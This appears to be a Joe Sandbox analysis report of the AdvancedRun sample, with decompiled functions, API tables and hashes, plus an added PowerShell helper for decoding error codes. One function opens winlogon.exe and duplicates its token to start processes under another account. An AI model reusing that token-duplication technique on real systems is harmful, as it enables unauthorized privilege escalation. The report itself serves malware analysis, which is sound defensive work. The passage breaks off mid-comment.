                                                                  			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
                                                                  				struct HDWP__* _v8;
                                                                  				intOrPtr* _v12;
                                                                  				void _v534;
                                                                  				short _v536;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				intOrPtr _t42;
                                                                  				intOrPtr* _t95;
                                                                  				RECT* _t96;
                                                                  
                                                                  				_t95 = __ecx;
                                                                  				_v12 = __ecx;
                                                                  				if(_a4 == 0x233) {
                                                                  					_v536 = 0;
                                                                  					memset( &_v534, 0, 0x208);
                                                                  					DragQueryFileW(_a8, 0,  &_v536, 0x104);
                                                                  					DragFinish(_a8);
                                                                  					 *((intOrPtr*)( *_t95 + 4))(0);
                                                                  					E00404923(0x104, _t95 + 0x1680,  &_v536);
                                                                  					 *((intOrPtr*)( *_v12 + 4))(1);
                                                                  					_t95 = _v12;
                                                                  				}
                                                                  				if(_a4 != 5) {
                                                                  					if(_a4 != 0xf) {
                                                                  						if(_a4 == 0x24) {
                                                                  							_t42 = _a12;
                                                                  							 *((intOrPtr*)(_t42 + 0x18)) = 0x1f4;
                                                                  							 *((intOrPtr*)(_t42 + 0x1c)) = 0x12c;
                                                                  						}
                                                                  					} else {
                                                                  						E00402EC8(_t95 + 0x40);
                                                                  					}
                                                                  				} else {
                                                                  					_v8 = BeginDeferWindowPos(0xd);
                                                                  					_t96 = _t95 + 0x40;
                                                                  					E00402E22(_t96, _t44, 0x401, 1, 1, 0, 0);
                                                                  					E00402E22(_t96, _v8, 2, 1, 1, 0, 0);
                                                                  					E00402E22(_t96, _v8, 0x419, 1, 1, 0, 0);
                                                                  					E00402E22(_t96, _v8, 0x40f, 1, 1, 0, 0);
                                                                  					E00402E22(_t96, _v8, 0x40e, 1, 1, 0, 0);
                                                                  					E00402E22(_t96, _v8, 0x40d, 1, 1, 0, 0);
                                                                  					E00402E22(_t96, _v8, 0x3fb, 0, 0, 1, 1);
                                                                  					E00402E22(_t96, _v8, 0x3fd, 0, 0, 1, 1);
                                                                  					E00402E22(_t96, _v8, 0x402, 0, 0, 1, 0);
                                                                  					E00402E22(_t96, _v8, 0x3e9, 0, 0, 1, 0);
                                                                  					E00402E22(_t96, _v8, 0x3ea, 0, 0, 1, 0);
                                                                  					E00402E22(_t96, _v8, 0x3ee, 1, 0, 0, 0);
                                                                  					E00402E22(_t96, _v8, 0x3f3, 1, 0, 0, 0);
                                                                  					E00402E22(_t96, _v8, 0x404, 0, 0, 1, 0);
                                                                  					E00402E22(_t96, _v8, 0x3f6, 1, 0, 0, 0);
                                                                  					EndDeferWindowPos(_v8);
                                                                  					InvalidateRect( *(_t96 + 0x10), _t96, 1);
                                                                  					_t95 = _v12;
                                                                  				}
                                                                  				return E00402CED(_t95, _a4, _a8, _a12);
                                                                  			}

                                                                  APIs
                                                                  • memset.MSVCRT ref: 0040421E
                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00404236
                                                                  • DragFinish.SHELL32(?), ref: 0040423F
                                                                    • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                    • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                    • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                    • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                    • Part of subcall function 00402E22: DeferWindowPos.USER32 ref: 00402EB4
                                                                  • BeginDeferWindowPos.USER32(0000000D), ref: 0040427D
                                                                  • EndDeferWindowPos.USER32(?), ref: 004043A4
                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004043AF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: DeferWindow$DragRect$BeginClientFileFinishInvalidateItemQuerymemcpymemsetwcslen
                                                                  • String ID: $
                                                                  • API String ID: 2142561256-3993045852
                                                                  • Opcode ID: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                  • Instruction ID: d1d17b09954fcbdb96c5267886444c332edca9ead5b56a9d6021aa5aec52b2c2
                                                                  • Opcode Fuzzy Hash: c61b63023b15630986e37261bc436ca147b25cc6efa51280a6e109230e3069b6
                                                                  • Instruction Fuzzy Hash: F1518EB064011CBFEB126B52CDC9DBF7E6DEF45398F104065BA05792D1C6B84E05EAB4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 55%
                                                                  			E00405B81(signed short __ebx) {
                                                                  				signed int _t21;
                                                                  				void* _t22;
                                                                  				struct HINSTANCE__* _t25;
                                                                  				signed int _t27;
                                                                  				void* _t35;
                                                                  				signed short _t39;
                                                                  				signed int _t40;
                                                                  				void* _t57;
                                                                  				int _t61;
                                                                  				void* _t62;
                                                                  				int _t71;
                                                                  
                                                                  				_t39 = __ebx;
                                                                  				if( *0x41c470 == 0) {
                                                                  					E00405ADF();
                                                                  				}
                                                                  				_t40 =  *0x41c468;
                                                                  				_t21 = 0;
                                                                  				if(_t40 <= 0) {
                                                                  					L5:
                                                                  					_t57 = 0;
                                                                  				} else {
                                                                  					while(_t39 !=  *((intOrPtr*)( *0x41c460 + _t21 * 4))) {
                                                                  						_t21 = _t21 + 1;
                                                                  						if(_t21 < _t40) {
                                                                  							continue;
                                                                  						} else {
                                                                  							goto L5;
                                                                  						}
                                                                  						goto L6;
                                                                  					}
                                                                  					_t57 =  *0x41c458 +  *( *0x41c464 + _t21 * 4) * 2;
                                                                  				}
                                                                  				L6:
                                                                  				if(_t57 != 0) {
                                                                  					L21:
                                                                  					_t22 = _t57;
                                                                  				} else {
                                                                  					if((_t39 & 0x00010000) == 0) {
                                                                  						if( *0x40fb90 == 0) {
                                                                  							_push( *0x41c478 - 1);
                                                                  							_push( *0x41c45c);
                                                                  							_push(_t39);
                                                                  							_t25 = E00405CE7();
                                                                  							goto L15;
                                                                  						} else {
                                                                  							wcscpy(0x40fda0, L"strings");
                                                                  							_t35 = E00405EDD(_t39,  *0x41c45c);
                                                                  							_t62 = _t62 + 0x10;
                                                                  							if(_t35 == 0) {
                                                                  								L13:
                                                                  								_t25 = GetModuleHandleW(0);
                                                                  								_push( *0x41c478 - 1);
                                                                  								_push( *0x41c45c);
                                                                  								_push(_t39);
                                                                  								goto L15;
                                                                  							} else {
                                                                  								_t61 = wcslen( *0x41c45c);
                                                                  								if(_t61 == 0) {
                                                                  									goto L13;
                                                                  								}
                                                                  							}
                                                                  						}
                                                                  					} else {
                                                                  						_t25 = GetModuleHandleW(_t57);
                                                                  						_push( *0x41c478 - 1);
                                                                  						_push( *0x41c45c);
                                                                  						_push(_t39 & 0x0000ffff);
                                                                  						L15:
                                                                  						_t61 = LoadStringW(_t25, ??, ??, ??);
                                                                  						_t71 = _t61;
                                                                  					}
                                                                  					if(_t71 <= 0) {
                                                                  						L20:
                                                                  						_t22 = 0x40c4e8;
                                                                  					} else {
                                                                  						_t27 =  *0x41c46c;
                                                                  						if(_t27 + _t61 + 2 >=  *0x41c470 ||  *0x41c468 >=  *0x41c474) {
                                                                  							goto L20;
                                                                  						} else {
                                                                  							_t57 =  *0x41c458 + _t27 * 2;
                                                                  							_t14 = _t61 + 2; // 0x2
                                                                  							memcpy(_t57,  *0x41c45c, _t61 + _t14);
                                                                  							 *( *0x41c464 +  *0x41c468 * 4) =  *0x41c46c;
                                                                  							 *( *0x41c460 +  *0x41c468 * 4) = _t39;
                                                                  							 *0x41c468 =  *0x41c468 + 1;
                                                                  							 *0x41c46c =  *0x41c46c + _t61 + 1;
                                                                  							if(_t57 != 0) {
                                                                  								goto L21;
                                                                  							} else {
                                                                  								goto L20;
                                                                  							}
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  				return _t22;
                                                                  			}
                                                                  0x00405c8a
                                                                  0x00405c8d
                                                                  0x00405c99
                                                                  0x00405caf
                                                                  0x00405cbd
                                                                  0x00405cc8
                                                                  0x00405cd4
                                                                  0x00405cd9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00405cd9
                                                                  0x00405c74
                                                                  0x00405c63
                                                                  0x00405ce6

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                  • wcscpy.MSVCRT ref: 00405C02
                                                                    • Part of subcall function 00405EDD: memset.MSVCRT ref: 00405EF0
                                                                    • Part of subcall function 00405EDD: _itow.MSVCRT ref: 00405EFE
                                                                  • wcslen.MSVCRT ref: 00405C20
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                  • LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                  • memcpy.MSVCRT ref: 00405C99
                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B19
                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B37
                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B55
                                                                    • Part of subcall function 00405ADF: ??2@YAPAXI@Z.MSVCRT ref: 00405B73
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                  • String ID: strings
                                                                  • API String ID: 3166385802-3030018805
                                                                  • Opcode ID: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                  • Instruction ID: 6100db9a332bdf9cdae47e625800c2dd81fdb4e1827941160d8c77da4bb91491
                                                                  • Opcode Fuzzy Hash: 484a3de7b2935987b64b240b2dbd95e532bbb3e4d7f0d1989cc78b1e10ca5163
                                                                  • Instruction Fuzzy Hash: F0417A74188A149FEB149B54ECE5DB73376F785708720813AE802A72A1DB39AC46CF6C
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 75%
                                                                  			E00401E44(int _a4, int _a8, intOrPtr* _a12) {
                                                                  				char _v8;
                                                                  				void* _v12;
                                                                  				void* __esi;
                                                                  				void* _t18;
                                                                  				intOrPtr* _t22;
                                                                  				void* _t23;
                                                                  				void* _t28;
                                                                  				int _t37;
                                                                  				intOrPtr* _t39;
                                                                  				intOrPtr* _t40;
                                                                  
                                                                  				_v8 = 0;
                                                                  				_t18 = OpenProcess(0x2000000, 0, _a8);
                                                                  				_v12 = _t18;
                                                                  				if(_t18 == 0) {
                                                                  					_t37 = GetLastError();
                                                                  				} else {
                                                                  					_t39 = _a4 + 0x800;
                                                                  					_a8 = 0;
                                                                  					E0040289F(_t39);
                                                                  					_t22 =  *((intOrPtr*)(_t39 + 4));
                                                                  					if(_t22 == 0) {
                                                                  						_t23 = 0;
                                                                  					} else {
                                                                  						_t23 =  *_t22(_v12, 2,  &_a8);
                                                                  					}
                                                                  					if(_t23 == 0) {
                                                                  						_t37 = GetLastError();
                                                                  					} else {
                                                                  						_a4 = _a8;
                                                                  						E0040289F(_t39);
                                                                  						_t40 =  *((intOrPtr*)(_t39 + 8));
                                                                  						if(_t40 == 0) {
                                                                  							_t28 = 0;
                                                                  						} else {
                                                                  							_t28 =  *_t40(_a4, 0x2000000, 0, 2, 1,  &_v8);
                                                                  						}
                                                                  						if(_t28 == 0) {
                                                                  							_t37 = GetLastError();
                                                                  						} else {
                                                                  							 *_a12 = _v8;
                                                                  							_t37 = 0;
                                                                  						}
                                                                  						CloseHandle(_a8);
                                                                  					}
                                                                  					CloseHandle(_v12);
                                                                  				}
                                                                  				return _t37;
                                                                  			}

Instruction addresses for the listing above (disassembly address column; the instruction text was not captured):
0x00401e59 0x00401e5c 0x00401e64 0x00401e67 0x00401ef9 0x00401e6d 0x00401e70 0x00401e76 0x00401e79 0x00401e7e
0x00401e83 0x00401e92 0x00401e85 0x00401e8e 0x00401e8e 0x00401e96 0x00401ee6 0x00401e98 0x00401e9b 0x00401e9e
0x00401ea3 0x00401ea8 0x00401ebb 0x00401eaa 0x00401eb7 0x00401eb7 0x00401ebf 0x00401ed3 0x00401ec1 0x00401ec7
0x00401ec9 0x00401ec9 0x00401ed8 0x00401ed8 0x00401eeb 0x00401eeb 0x00401f01

                                                                  APIs
                                                                  • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                    • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                    • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                  • String ID: winlogon.exe
                                                                  • API String ID: 1315556178-961692650
                                                                  • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                  • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                  • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                  • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 79%
                                                                  			E00405236(short* __ebx, intOrPtr _a4) {
                                                                  				int _v8;
                                                                  				char _v12;
                                                                  				void _v2058;
                                                                  				void _v2060;
                                                                  				int _t35;
                                                                  				int _t41;
                                                                  				signed int _t48;
                                                                  				signed int _t49;
                                                                  				signed short* _t50;
                                                                  				void** _t52;
                                                                  				void* _t53;
                                                                  				void* _t54;
                                                                  
                                                                  				_t48 = 0;
                                                                  				_v2060 = 0;
                                                                  				memset( &_v2058, 0, 0x7fe);
                                                                  				_t54 = _t53 + 0xc;
                                                                  				 *__ebx = 0;
                                                                  				_t52 = _a4 + 4;
                                                                  				_v12 = 2;
                                                                  				do {
                                                                  					_push( *_t52);
                                                                  					_t6 = _t52 - 4; // 0xe80040cb
                                                                  					_push( *_t6);
                                                                  					_push(L"%s (%s)");
                                                                  					_push(0x400);
                                                                  					_push( &_v2060);
                                                                  					L0040B1EC();
                                                                  					_t35 = wcslen( &_v2060);
                                                                  					_v8 = _t35;
                                                                  					memcpy(__ebx + _t48 * 2,  &_v2060, _t35 + _t35 + 2);
                                                                  					_t49 = _t48 + _v8 + 1;
                                                                  					_t41 = wcslen( *_t52);
                                                                  					_v8 = _t41;
                                                                  					memcpy(__ebx + _t49 * 2,  *_t52, _t41 + _t41 + 2);
                                                                  					_t54 = _t54 + 0x34;
                                                                  					_t52 =  &(_t52[2]);
                                                                  					_t23 =  &_v12;
                                                                  					 *_t23 = _v12 - 1;
                                                                  					_t48 = _t49 + _v8 + 1;
                                                                  				} while ( *_t23 != 0);
                                                                  				_t50 = __ebx + _t48 * 2;
                                                                  				 *_t50 =  *_t50 & 0x00000000;
                                                                  				_t50[1] = _t50[1] & 0x00000000;
                                                                  				return __ebx;
                                                                  			}

Instruction addresses for the listing above (disassembly address column; the instruction text was not captured):
0x00405241 0x00405250 0x00405257 0x0040525f 0x00405262 0x00405265 0x00405268 0x0040526f 0x0040526f 0x00405277
0x00405277 0x0040527a 0x0040527f 0x00405284 0x00405285 0x00405291 0x00405296 0x004052a9 0x004052b3 0x004052b7
0x004052bc 0x004052ca 0x004052d2 0x004052d5 0x004052d8 0x004052d8 0x004052db 0x004052db 0x004052e1 0x004052e4
0x004052e8 0x004052f2

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
• Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
• Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memcpywcslen$_snwprintfmemset
                                                                  • String ID: %s (%s)
                                                                  • API String ID: 3979103747-1363028141
                                                                  • Opcode ID: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                  • Instruction ID: 65e1e814fa0bf8ea8ab085bd6ee3311c73c19872bc06834ae6b579d31858dd7b
                                                                  • Opcode Fuzzy Hash: 78317d02bfcb08935322c08fe3645b21644df8c2b86268209298db670e7b3c37
                                                                  • Instruction Fuzzy Hash: C411517280020DEBCF21DF94CC49D8BB7B8FF44308F1144BAE944A7152EB74A6588BD8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 78%
                                                                  			E0040614F(void* __ecx, void* __eflags, struct HWND__* _a4) {
                                                                  				void _v514;
                                                                  				short _v516;
                                                                  				void _v8710;
                                                                  				short _v8712;
                                                                  				int _t17;
                                                                  				WCHAR* _t26;
                                                                  
                                                                  				E0040B550(0x2204, __ecx);
                                                                  				_v8712 = 0;
                                                                  				memset( &_v8710, 0, 0x2000);
                                                                  				_t17 = GetDlgCtrlID(_a4);
                                                                  				_t34 = _t17;
                                                                  				GetWindowTextW(_a4,  &_v8712, 0x1000);
                                                                  				if(_t17 > 0 && _v8712 != 0) {
                                                                  					_v516 = 0;
                                                                  					memset( &_v514, 0, 0x1fe);
                                                                  					GetClassNameW(_a4,  &_v516, 0xff);
                                                                  					_t26 =  &_v516;
                                                                  					_push(L"sysdatetimepick32");
                                                                  					_push(_t26);
                                                                  					L0040B278();
                                                                  					if(_t26 != 0) {
                                                                  						E00406025(_t34,  &_v8712);
                                                                  					}
                                                                  				}
                                                                  				return 1;
                                                                  			}

Instruction addresses for the listing above (disassembly address column; the instruction text was not captured):
0x00406157 0x0040616d 0x00406174 0x0040617f 0x00406185 0x00406196 0x0040619e 0x004061b6 0x004061bd 0x004061d4
0x004061da 0x004061e0 0x004061e5 0x004061e6 0x004061ef 0x004061f9 0x004061ff 0x004061ef 0x00406206

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                  • String ID: sysdatetimepick32
                                                                  • API String ID: 1028950076-4169760276
                                                                  • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                  • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                  • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                  • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 68%
			/* Formats a Win32 error code into the caller's buffer _a4. Codes in the LAN Manager range
			   (NERR_BASE 0x834 = 2100 .. MAX_NERR 0x834 + 0x383 = 2999) are not in the system message
			   table, so netmsg.dll is loaded as a data file and searched first. */
			E00404706(long __edi, wchar_t* _a4) {
				wchar_t* _v8;      /* receives the buffer LocalAlloc'd by FORMAT_MESSAGE_ALLOCATE_BUFFER */
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;      /* error code to format */
				_t8 = 0;
				_t14 = 0x1100;     /* FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_ALLOCATE_BUFFER */
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);   /* 2 = LOAD_LIBRARY_AS_DATAFILE; the handle is never freed */
					if(_t8 != 0) {                                /* the decompiler rendered this test as "0 != 0" */
						_t14 = 0x1900;                            /* adds FORMAT_MESSAGE_FROM_HMODULE */
					}
				}
				/* dwLanguageId 0x400 = MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT). FORMAT_MESSAGE_IGNORE_INSERTS
				   is not set although Arguments is NULL; a failed call takes the fixed-string fallback below. */
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);          /* fallback string at 0x40c4e8 */
				} else {
					if(wcslen(_v8) < 0x400) {              /* caller buffer holds 0x400 wide chars */
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                  0x00404706
                                                                  0x00404714
                                                                  0x0040471c
                                                                  0x00404721
                                                                  0x0040472b
                                                                  0x00404733
                                                                  0x00404735
                                                                  0x00404735
                                                                  0x00404733
                                                                  0x00404751
                                                                  0x00404780
                                                                  0x00404753
                                                                  0x0040475e
                                                                  0x00404766
                                                                  0x0040476c
                                                                  0x00404770
                                                                  0x00404770
                                                                  0x0040478a

                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                  • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                  • wcslen.MSVCRT ref: 00404756
                                                                  • wcscpy.MSVCRT ref: 00404766
                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                  • wcscpy.MSVCRT ref: 00404780
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.281395030.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000005.00000002.281389096.0000000000400000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281411278.000000000040C000.00000002.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281418049.000000000040F000.00000004.00020000.sdmp
                                                                  • Associated: 00000005.00000002.281425083.000000000041D000.00000002.00020000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_400000_AdvancedRun.jbxd
                                                                  Similarity
                                                                  • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                  • String ID: netmsg.dll
                                                                  • API String ID: 2767993716-3706735626
                                                                  • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                  • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                  • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                  • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%
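
The function above (E00404706) is a FormatMessageW wrapper that switches to netmsg.dll for the NERR code range. The PowerShell script below is an added example written for this report, not code from the sample or its author; it reproduces the same lookup through P/Invoke so an analyst can decode the codes the sample would have shown. The class name NetMsg and the function name Get-Win32ErrorText are this example's own. Unlike the sample it sets FORMAT_MESSAGE_IGNORE_INSERTS, because the sample passes a NULL Arguments pointer without that flag, and it frees the netmsg.dll handle the sample leaks.

```powershell
# Added example: decode a Win32 / NERR error code the way the sample's E00404706 does.
# NetMsg and Get-Win32ErrorText are names chosen for this example.
$sig = @'
using System;
using System.Runtime.InteropServices;
using System.Text;
public static class NetMsg {
    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern IntPtr LoadLibraryEx(string lpFileName, IntPtr hFile, uint dwFlags);
    [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
    public static extern uint FormatMessage(uint dwFlags, IntPtr lpSource, uint dwMessageId,
        uint dwLanguageId, StringBuilder lpBuffer, uint nSize, IntPtr Arguments);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool FreeLibrary(IntPtr hModule);
}
'@
Add-Type -TypeDefinition $sig

function Get-Win32ErrorText {
    param([Parameter(Mandatory)][uint32]$Code)

    $FORMAT_MESSAGE_FROM_SYSTEM    = 0x1000   # the sample's 0x1100 is FROM_SYSTEM | ALLOCATE_BUFFER
    $FORMAT_MESSAGE_FROM_HMODULE   = 0x0800   # ORed in by the sample (0x1900) once netmsg.dll is loaded
    $FORMAT_MESSAGE_IGNORE_INSERTS = 0x0200   # not set by the sample; added so %1-style inserts cannot break the call
    $LOAD_LIBRARY_AS_DATAFILE      = 0x0002   # same flag the sample passes to LoadLibraryExW
    $LANG_NEUTRAL_DEFAULT          = 0x0400   # MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), as in the sample
    $NERR_BASE = 2100; $MAX_NERR = 2999       # 0x834 .. 0x834 + 0x383, the sample's range test

    $flags = $FORMAT_MESSAGE_FROM_SYSTEM -bor $FORMAT_MESSAGE_IGNORE_INSERTS
    $hMod  = [IntPtr]::Zero
    if ($Code -ge $NERR_BASE -and $Code -le $MAX_NERR) {
        $hMod = [NetMsg]::LoadLibraryEx('netmsg.dll', [IntPtr]::Zero, $LOAD_LIBRARY_AS_DATAFILE)
        if ($hMod -ne [IntPtr]::Zero) { $flags = $flags -bor $FORMAT_MESSAGE_FROM_HMODULE }
    }

    $buf = New-Object System.Text.StringBuilder 1024   # the sample only accepts results shorter than 0x400 chars
    $len = [NetMsg]::FormatMessage($flags, $hMod, $Code, $LANG_NEUTRAL_DEFAULT, $buf, [uint32]$buf.Capacity, [IntPtr]::Zero)
    if ($hMod -ne [IntPtr]::Zero) { [void][NetMsg]::FreeLibrary($hMod) }
    if ($len -eq 0) { return "Unknown error $Code" }   # the sample copies a fixed fallback string here
    return $buf.ToString().TrimEnd()
}

# Usage: ERROR_ACCESS_DENIED (5) comes from the system table, NERR_UserNotFound (2221) only from netmsg.dll
Get-Win32ErrorText -Code 5
Get-Win32ErrorText -Code 2221
```

Without the netmsg.dll step the second call returns the "Unknown error" fallback, which is exactly why the sample bothers with the extra library load.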

                                                                  C-Code - Quality: 90%
			/* Walks the process list and returns the PID of the first process that runs as user _a4 and whose
			   primary token can be opened with TOKEN_DUPLICATE, i.e. a token source for starting a program under
